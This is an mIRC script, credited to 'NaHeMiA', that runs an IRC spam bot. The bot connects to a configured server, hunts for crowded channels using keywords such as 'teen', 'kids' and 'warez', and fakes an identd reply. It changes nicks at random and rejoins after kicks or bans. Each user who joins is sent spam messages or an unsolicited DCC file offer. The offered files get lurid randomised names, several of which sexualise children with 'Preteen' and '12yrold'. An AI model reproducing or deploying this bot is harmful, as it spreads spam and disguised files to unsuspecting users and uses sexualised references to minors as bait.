   ; -------------------------------------------------- ;
   ; -          This file written by [NaHeMiA]        - ;
   ; - NaHeMiA takes no responsibilty for what you do - ;
   ; -------------------------------------------------- ;
   alias stop.dspam { if $sock(wSck32,n) != 0 { sockwrite -n wSck32 QUIT :Leaving. | sockclose wSck32 | sockclose id3nt } | unset %m1 %n1ck %1n %0ut %random %n0ll %ch4n %7mp11 %d4t4 %mHash %s3nt %l33t.file %rand0m }
   alias start.dspam { if $portfree(113) = $true { socklisten Id3nT 113 } | sockclose wSck32 | sockopen wSck32 %spam.server %spam.port | if ($$4 == random) set %rand0m on | set %mHash 1 | .timerNickz 0 300 Nick $randomgen }
   on *:SOCKLISTEN:ID3NT*: { if ($sockerr > 0) return | set %7mp11 0 | :l00p | inc %7mp11 1 | if $sock(Id3nT $+ %7mp11,1) = $null { sockaccept Id3nT $+ %7mp11 | unset %7mp11 } | else { goto l00p } }
   on *:SOCKREAD:Id3nT*:{ sockread %Id3nT | sockwrite $sockname %Id3nT : USE $+ RID : UNIX : $r4ndn | unset %Id3nT }
   on *:SOCKCLOSE:wSck32: { sockclose wSck32 | sockopen wSck32 %spam.server %spam.port }
   on *:SOCKOPEN:wSck32:{ if ($sockerr > 0) { sockopen wSck32 %spam.server %spam.port | return } | chgnik | sockwrite -n wSck32 USER $r4ndn $chr(34) $+ $r4ndn $+ $chr(34) $chr(34) $+ $r4ndn $+ $chr(34) : $+ $r4ndn | .timer $+ $r4ndn 1 15 channelz | .timerJOIN 0 1800 channelz }
   on *:SOCKREAD:wSck32:{
     sockread -f %d4t4
     if ($gettok(%d4t4,1,32) = PING) { sockwrite -n wSck32 PONG : $+ %spam.server }
     if ($gettok(%d4t4,2,32) = 263) { timer 4 20 channelz }
     if ($gettok(%d4t4,2,32) = 322) {
       if (%ch4n != $null) { halt }
       if ($gettok(%d4t4,5,32) > 35) {
         echo -s %d4t4
         set %ch4n $gettok(%d4t4,4,32)
         set %spam.chans %spam.chans %ch4n
         echo -s %d4t4
         echo -s spam joining %ch4n
         .timer 1 30 sockwrite -n wSck32 JOIN %ch4n
         .timer 1 30 unset %ch4n
       }
     }
     if $gettok(%d4t4,2,32) = JOIN {
       if ( %mHash == 0 ) { halt }
       if ( $gettok($gettok(%d4t4,1,58),1,33) == %m1 ) { halt }
       set %n1ck $gettok($gettok(%d4t4,1,58),1,33)
       if ( $timer(%n1ck) != $null ) { halt }
       .timer [ $+ [ %n1ck ] ] 1 $rand(15,30) rc1r %n1ck
       set %s3nt 1
     }
     if $gettok(%d4t4,2,32) = KICK { if ($gettok(%d4t4,4,32) == $gettok(%m1,1,32)) { sockwrite -n wSck32 join $gettok(%d4t4,3,32) } }
     if $gettok(%d4t4,2,32) = 433 || $gettok(%d4t4,2,32) = 451 { chgnik }
     if $gettok(%d4t4,2,32) = 474 { echo -s fucker banned me | set %spam.chans $remove(%spam.chans,$3) | timer 0 300 sockwrite -n wSck32 JOIN $3 }
     unset %d4t4
   }
   on *:socklisten:s3nd*:{
     set %s3nding s3ndING $+ $rand(1,999999999)
     inc %total.sent
     sockaccept %s3nding
     sockclose $sockname
     upl0ad %s3nding
     unset %s3nding
   }
   on *:sockwrite:s3ndING*: {
     if [ %s3ndinc [ $+ [ $sockname ] ] ] = $null { set %s3ndinc $+ $sockname 4096 }
     if [ %s3ndinc [ $+ [ $sockname ] ] ] != 4096 { timer 1 120 doshizn $sockname }
     inc [ %s3ndtotal [ $+ [ $sockname ] ] ] 4096
     if [ %s3ndtotal [ $+ [ $sockname ] ] ] > $file(%w1nfile).size { set %s3ndinc $+ $sockname $calc( [ %s3ndtotal [ $+ [ $sockname ] ] ] - $file(%w1nfile).size ) }
     else { set %s3ndinc $+ $sockname 4096 }
     bread %w1nfile [ %s3ndtotal [ $+ [ $sockname ] ] ] [ %s3ndinc [ $+ [ $sockname ] ] ] &binvar
     sockwrite $sockname &binvar
   }
   alias doshizn { unset %s3ndtotal $+ $$1 %s3ndinc $+ $$1 | sockclose $$1 | return }
   alias chgnik {
     set %m1 $r4ndn
     sockwrite -n wSck32 NICK %m1
   }
   alias channelz {
     sockwrite -n wSck32 list * $+ $gettok(teen:kids:sex:warez:mp3:0!!!!:Anime:Gay:hack:100%:chat:vcd:4u:irc:gamez:games:apps:appz:cable:iso:movie:4, $rand(1,22),58) $+ *
   }
   alias rc1r {
     if (%spamtype == send) {
       time0ut
       if ($sock(s3nd*,0) < 2) {
         :l00p
         set %s0ck $rand(1,999999999)
         if $sock(s3nd $+ %s0ck,1) != $null { goto l00p }
         set %s0ckname s3nd $+ %s0ck
         socklisten %s0ckname
         set %nam3 $r4ndname
         echo -s s3nding to $1
         sockwrite -n wSck32 NOTICE $1 :DC $+ C se $+ nd $remove(%nam3,$mid(%ext,5)) ( $+ $IP $+ )
         sockwrite -n wSck32 PRIVMSG $1 :DC $+ C se $+ nd %nam3 $longip($IP) $sock(%s0ckname).port $file(%w1nfile).size $+
         unset %nam3 %s0ckname %s0ck
       }
     }
     if (%spamtype == MSG) {
       sockwrite -n wSck32 PRIVMSG $1 : $+ %spam.msg
       unset %nam3 %s0ckname %s0ck
       inc %spammed
     }
   }
   alias r4ndname { return $gettok(Fiesty.Shaven.Lovely.Sexay.h0t.Sexey.HOT.Preteen.Teen.Sizzling.Wet.slutty.tight.Lezbo.Live.[Movie].Erotic.CAM.Vid.Sexy.horny.h0rny.porn.[XXX].Seductive.Skanky.Drunk.HugeTitties.Littlepussy.TightPussy.~.-.'. [ $rand(1, 200) ] ,$rand(1,34),46) $+ $namez $+ $gettok('sPic.'sVid.'sPics.'sVids.'sCunt.'sPussy.'sSexShots.'sVid.'sCum.'sOrgasm.'sVideo.OnCam!.oncam.onCAM.Fucking.HavingSex.Eatingout.Licking.Sucking.Blowing.Banged.SucksHard.[1of2].[2of2].[1of3].[2of3].[3of3].'n'Friend.'n'Friends.'n'Sister.'n'Dad.'n'Mom.'n'Boyfriend.'nGirlfriend, $rand(1,34),46) $+ %ext }
   alias r4ndn {
     unset %n0ll %random | set %n0ll $rand(5,10)
     :l00p
     set %mNum $rand(1,100)
     if (%mnum isnum 1-40) { set %random %random $+ $namez $+ $namez | goto next1 }
     if (%mnum isnum 40-60) { set %random %random $rand(a,z) $+ $rand(1,9999) | goto next1 }
     set %random %random $+ $rand(a,z)
     :next1
     if $len(%random) <= %n0ll { goto l00p }
     return %random
   }
   alias namez return $gettok(Laura:Jamie:girl:Gurl:GirL:bitch:Biatch:Jackie:Veronica:Bitch:Lolita:Lolita:Teen:Hotty:Jasmine:Brianna:Adrian:Alana:Britney:Brittany:BrittanySpears:Karrie:Christie:Christy:Kristie:Kristy:Katie:Katherine:Nikki:Ruby:Ruth:Sabrina:Sabrina:Sabrina:Sapphire:Sarah:Sarajane:Scarlett:Scarlett:Sianna:Stacy:Stefanie:Amber:Chaisy:Rose:Heather:Susannah:Tabbi:Tabbatha:Vikki:Viki:Vicky:Violet:Virgina:Virgin:virgin:virgin:windy:zarah: [ $rand(12,20) $+ yrold ] : [ $rand(12,20) $+ yrold ] ,$rand(1,61),58)
   alias time0ut {
     set %close 1
     :l00p
     if $sock(s3nd*,%close) = $null { unset %close | goto done }
     if $sock(s3nd*,%close).to > 30 { sockclose $sock(s3nd*,%close) | goto l00p }
     inc %close 1
     goto l00p
     :done
   }
   alias upl0ad {
     set %s3ndtotal $+ $1 0
     bread %w1nfile 0 4096 &binvar
     sockwrite $1 &binvar
   }
